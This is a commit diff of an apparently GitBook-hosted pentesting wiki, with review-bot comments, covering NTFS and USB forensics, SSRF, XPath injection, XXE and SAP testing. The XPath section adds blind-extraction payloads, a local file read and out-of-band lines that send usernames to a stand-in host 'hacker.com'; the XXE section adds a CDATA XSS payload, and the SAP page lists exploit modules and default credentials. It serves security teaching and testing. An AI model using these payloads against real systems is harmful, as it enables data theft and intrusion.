GitBook: [master] 7 pages and 14 assets modified

This commit is contained in:
CPol 2021-06-06 18:35:32 +00:00 committed by gitbook-bot
parent 853a3c8146
commit 452bc1d9fc
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
17 changed files with 96 additions and 17 deletions

View file

@ -134,7 +134,7 @@ Some interesting attributes:
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) \(among others\):
* Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides.
![](../../../.gitbook/assets/image%20%28507%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28507%29%20%281%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28512%29.png)
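Review bot: The only change in this hunk is the image reference, and the new path `image%20%28507%29%20%281%29%20%281%29.png` differs from the old one solely by another GitBook-generated `%20%281%29` suffix, so this looks like the same screenshot re-uploaded as a duplicate asset rather than a content fix; consider keeping one copy in `.gitbook/assets` and pointing the page at it, otherwise every sync adds another binary. While this paragraph is open, "the attribute data is not resident" would read better with the NTFS term "non-resident", which is what the screenshot is meant to illustrate.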

View file

@ -130,7 +130,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%282%29%20%281%29.png)
### USB Detective
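Review bot: The hunk swaps only the screenshot of `setupapi.dev.log`, and the new file name again carries one more `%20%281%29` suffix than the old one, i.e. a duplicated asset. Since the text tells the reader to search for `Section start`, it would be more useful to inline one or two lines of the log around that marker as text so the page is greppable and the screenshot becomes optional.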

View file

@ -601,7 +601,7 @@ Many apps log informative \(and potentially sensitive\) messages to the console
5. Reproduce the problem.
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%281%29.png)
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%282%29%20%281%29.png)
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:

View file

@ -506,6 +506,10 @@ curl http://rancher-metadata/<version>/<path>
The difference between a blind SSRF and a not blind one is that in the blind you cannot see the response of the SSRF request. Then, it is more difficult to exploit because you will be able to exploit only well-known vulnerabilities.
### Time based SSRF
**Checking the time** of the responses from the server it might be **possible to know if a resource exists or not** \(maybe it takes more time accessing an existing resource than accessing one that doesn't exist\)
## Detect SSRF
You can use [https://github.com/teknogeek/ssrf-sheriff](https://github.com/teknogeek/ssrf-sheriff) to create an HTTP server that will respond correctly to a lot of different requests \(GET, POST, PTU, DELETE, JSON, TXT, GIF, MP3...\).
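Review bot: The new "Time based SSRF" paragraph gives no procedure, and a single timing comparison is unreliable. Suggest stating that you first establish baselines against a target you know is reachable and one you know is not, repeat each request several times and compare medians, and explain why the timings differ: a closed port on a live host normally yields a fast connection-refused, whereas an unroutable address or a filtered port hangs until the application's connect timeout, so the "takes more time" guess in the paragraph can go either way. In the "Detect SSRF" line that follows, "PTU" should read "PUT".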

View file

@ -101,7 +101,7 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
## Example
```text
```markup
<?xml version="1.0" encoding="ISO-8859-1"?>
<data>
<user>
@ -122,6 +122,8 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
</data>
```
### Access the information
```text
All names - [pepe, mark, fino]
name
@ -149,6 +151,43 @@ string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe
substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"
```
### Identify & stealing the schema
```python
and count(/*) = 1 #root
and count(/*[1]/*) = 2 #count(root) = 2 (a,c)
and count(/*[1]/*[1]/*) = 1 #count(a) = 1 (b)
and count(/*[1]/*[1]/*[1]/*) = 0 #count(b) = 0
and count(/*[1]/*[2]/*) = 3 #count(c) = 3 (d,e,f)
and count(/*[1]/*[2]/*[1]/*) = 0 #count(d) = 0
and count(/*[1]/*[2]/*[2]/*) = 0 #count(e) = 0
and count(/*[1]/*[2]/*[3]/*) = 1 #count(f) = 1 (g)
and count(/*[1]/*[2]/*[3]/[1]*) = 0 #count(g) = 0
#The previous solutions are the representation of a schema like the following
#(at this stage we don't know the name of the tags, but jus the schema)
<root>
<a>
<b></b>
</a>
<c>
<d></d>
<e></e>
<f>
<h></h>
</f>
</c>
</root>
and name(/*[1]) = "root" #Confirm the name of the first tag is "root"
and substring(name(/*[1]/*[1]),1,1) = "a" #First char of name of tag `<a>` is "a"
and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105 #Firts char of tag `<b>`is codepoint 105 ("i") (https://codepoints.net/)
#Stealing the schema via OOB
doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
```
## Authentication Bypass
### **Example of queries:**
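Review bot: The last `count()` line in the new schema block, `count(/*[1]/*[2]/*[3]/[1]*) = 0`, is not valid XPath (a predicate cannot follow `/` directly) and should be `count(/*[1]/*[2]/*[3]/*[1]/*) = 0`; its comment also calls that child `g` while the sketched tree below shows `<h></h>`, so one of the two needs correcting. `string-to-codepoints()`, `doc()` and `doc-available()` are XPath 2.0/XQuery functions and raise an error on XPath 1.0 engines (libxml2 and everything built on it, such as Python's lxml and PHP's DOMXPath), so the section should say which processor version it assumes; on 1.0 you are limited to `name()`, `substring()` and `contains()` comparisons. In the context lines, `substrig(//user[position()=2/child::node()...` misspells `substring` and is missing the `]` that closes the first predicate, and the fence is tagged `python` although the block contains XPath.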
@ -226,19 +265,20 @@ The output contains strings and the user can manipulate the values to search:
## Blind Explotation
### **Get length of a value and extract it by comparisons:**
### **Get length of a value and extract it by comparisons:**
```text
```bash
' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''=' #True if length equals 4
' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' #True is first equals "a"
Other way
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
... and ( if ( $employee/role = 2 ) then error() else 0 )... #When error() is executed it rises an error and never returns a value
```
### **Example:**
### **Python Example**
```text
```python
import requests, string
flag = ""
@ -259,6 +299,31 @@ for i in range(1, l + 1): #print("[i] Looking for char number " + str(i))
break
```
### Read file
```python
(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127
```
## OOB Exploitation
```python
doc(concat("http://hacker.com/oob/", RESULTS))
doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))
doc(concat("http://hacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))
#Instead of doc() you can use the function doc-available
doc-available(concat("http://hacker.com/oob/", RESULTS))
#the doc available will respond true or false depending if the doc exists,
#user not(doc-available(...)) to invert the result if you need to
```
### Automatic tool
{% embed url="https://xcat.readthedocs.io/" %}
## References
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection)
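Review bot: The "Read file" payload has unbalanced parentheses and compares a string with a number: `(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127` has one `)` too many, and `substring()` returns a string, so `< 127` is either always false or a type error under XPath 2.0; the intended check is presumably `string-to-codepoints(substring(doc('file:///protected/secret.xml')/*[1]/*[1]/text()[1],3,1)) < 127` (a `file:` URI for an absolute path needs three slashes). In the OOB block, the `encode-for-uri()` variant should be presented as the one to use, since a username containing a space or `/` otherwise breaks the URL, and the text should note that `doc()` only works when the processor allows fetching external documents. "user not(doc-available(...))" should read "use not(doc-available(...))", and both fences are tagged `python` though they contain XPath.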

View file

@ -314,6 +314,12 @@ Once the server has downloaded your file, you need to find its location by brows
Writing files in a temporary directory can help to e**scalate another vulnerability that involves a path traversal** \(such as local file include, template injection, XSLT RCE, deserialization, etc\).
{% endhint %}
### XSS
```markup
<![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>
```
### DoS
#### Billion Laugh Attack
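Review bot: The new XSS snippet needs one sentence on when it applies: the `<![CDATA[...]]>` sections only keep `<` and `>` out of the XML parser's way, so the payload is just the text node `<script>alert(1)</script>` and fires only if the application later writes that element's text into an HTML response unescaped. As it stands the section sits under XXE without saying that it involves no entity at all, which will confuse readers looking for an XXE-to-XSS chain.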
@ -343,6 +349,10 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
#### Quadratic Blowup Attack
![](../.gitbook/assets/image%20%28479%29.png)
## Hidden XXE Surfaces
### XInclude
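Review bot: The "Quadratic Blowup Attack" section is a screenshot only (`image%20%28479%29.png`), so the payload can neither be copied nor searched; please inline it as text like the Billion Laughs block directly above it, i.e. one entity holding a long string referenced many thousands of times from the document body, which is the point that distinguishes it from nested entity expansion.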

View file

@ -1,6 +1,6 @@
# Pentesting SAP
### Introduction about SAP
## Introduction about SAP
SAP stands for Systems Applications and Products in Data Processing. SAP, by definition, is also the name of the ERP \(Enterprise Resource Planning\) software as well as the name of the company.
SAP system consists of a number of fully integrated modules, which covers virtually every aspect of business management.
@ -15,7 +15,7 @@ Youd be surprised if you knew how often these **passwords arent changed in
Try to get access to the shell of any server using username &lt;SID&gt;adm.
Bruteforcing can help, whoever there can be Account Lockout mechanism.
### Discovery
## Discovery
> Next section is mostly from [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures) from user shipcod3!
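Review bot: In the context lines of this hunk, "Bruteforcing can help, whoever there can be Account Lockout mechanism" should read "Bruteforcing can help, however there may be an account lockout mechanism", and the encoding damage in "Youd be surprised" / "arent changed" (the apostrophes were lost) is worth repairing while the paragraph is being touched.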
@ -63,7 +63,7 @@ msf auxiliary(sap_service_discovery) > run
[*] 192.168.96.101: - [SAP] Beginning service Discovery '192.168.96.101'
```
#### Testing the Thick Client / SAP GUI
### Testing the Thick Client / SAP GUI
Here is the command to connect to SAP GUI
`sapgui <sap server hostname> <system number>`
@ -126,7 +126,7 @@ BWDEVELOPER:Down1oad:001
* Check if you can execute system commands / run scripts in the client.
* Check if you can do XSS on BAPI Explorer
### Testing the web interface
## Testing the web interface
* Crawl the URLs \(see discovery phase\).
* Fuzz the URLs like in the discovery phase. Here is what [http://SAP:50000/index.html](http://sap:50000/index.html) looks like:
@ -176,7 +176,7 @@ This XML file does not appear to have any style information associated with it.
</SOAP-ENV:Envelope>
```
### Attack!
## Attack!
* Check if it runs on old servers or technologies like Windows 2000.
* Plan the possible exploits / attacks, there are a lot of Metasploit modules for SAP discovery \(auxiliary modules\) and exploits:
@ -243,7 +243,7 @@ Matching Modules
exploit/windows/http/sapdb_webtools 2007-07-05 great SAP DB 7.4 WebTools Buffer Overflow
exploit/windows/lpd/saplpd 2008-02-04 good SAP SAPLPD 6.28 Buffer Overflow
exploit/windows/misc/sap_2005_license 2009-08-01 great SAP Business One License Manager 2005 Buffer Overflow
exploit/windows/misc/sap_netweaver_dispatcher 2012-05-08 normal SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow
exploit/windows/misc/sap_netweaver_dispatcher 2012-05-08 normal SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow
```
* Try to use some known exploits \(check out Exploit-DB\) or attacks like the old but goodie “SAP ConfigServlet Remote Code Execution” in the SAP Portal:
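Review bot: The removed and added `exploit/windows/misc/sap_netweaver_dispatcher` lines in this hunk render identically, so the change appears to be whitespace only inside a fenced output block; either drop it or trim the whole block deliberately so the diff does not carry noise that hides real edits.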
@ -278,14 +278,14 @@ bizploit/plugins> back
bizploit> start
```
### Other Useful Tools for Testing
## Other Useful Tools for Testing
* [PowerSAP](https://github.com/airbus-seclab/powersap) - Powershell tool to assess sap security
* [Burp Suite](https://portswigger.net/burp) - a must have for directory fuzzing and web security assessments
* [pysap](https://github.com/SecureAuthCorp/pysap) - Python library to craft SAP network protocol packets
* [https://github.com/gelim/nmap-erpscan](https://github.com/gelim/nmap-erpscan) - Help nmap to detect SAP/ERP
### References
## References
* [SAP Penetration Testing Using Metasploit](http://information.rapid7.com/rs/rapid7/images/SAP%20Penetration%20Testing%20Using%20Metasploit%20Final.pdf)
* [https://github.com/davehardy20/SAP-Stuff](https://github.com/davehardy20/SAP-Stuff) - a script to semi-automate Bizploit